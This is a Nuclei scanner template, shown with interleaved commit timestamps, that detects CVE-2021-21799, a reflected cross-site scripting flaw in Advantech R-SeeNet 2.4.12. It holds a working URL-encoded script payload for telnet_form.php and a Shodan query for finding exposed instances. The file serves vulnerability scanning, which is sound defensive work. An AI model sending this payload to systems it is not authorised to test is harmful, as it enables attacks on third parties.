nuclei-templates/http/cves/2021/CVE-2021-21799.yaml

48 lines
1.3 KiB
YAML
Raw Normal View History

2022-08-05 05:55:22 +00:00
id: CVE-2021-21799
info:
name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting
2022-08-05 05:55:22 +00:00
author: arafatansari
severity: medium
description: |
Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality.
2022-08-05 05:55:22 +00:00
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270
2022-08-05 06:06:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-21799
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-21799
cwe-id: CWE-79
2023-07-15 16:29:17 +00:00
epss-score: 0.85976
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:advantech:r-seenet:2.4.12:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.98127
2022-08-05 05:55:22 +00:00
metadata:
max-request: 1
2022-08-05 06:06:50 +00:00
shodan-query: http.html:"R-SeeNet"
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: advantech
product: r-seenet
2022-08-05 23:44:09 +00:00
tags: cve,cve2021,xss,r-seenet
2022-08-05 05:55:22 +00:00
http:
2022-08-05 05:55:22 +00:00
- method: GET
path:
2022-08-05 06:06:50 +00:00
- "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"
2022-08-05 06:04:26 +00:00
2022-08-05 05:55:22 +00:00
matchers-condition: and
matchers:
- type: word
2022-08-05 06:14:29 +00:00
part: body
2022-08-05 23:44:09 +00:00
words:
- "<title>Telnet </title><script>alert(document.domain)</script><title></title>"
2022-08-05 05:55:22 +00:00
- type: word
2022-08-05 23:44:09 +00:00
part: header
2022-08-05 05:55:22 +00:00
words:
2022-08-05 06:14:29 +00:00
- "text/html"
2022-08-05 05:55:22 +00:00
- type: status
status:
- 200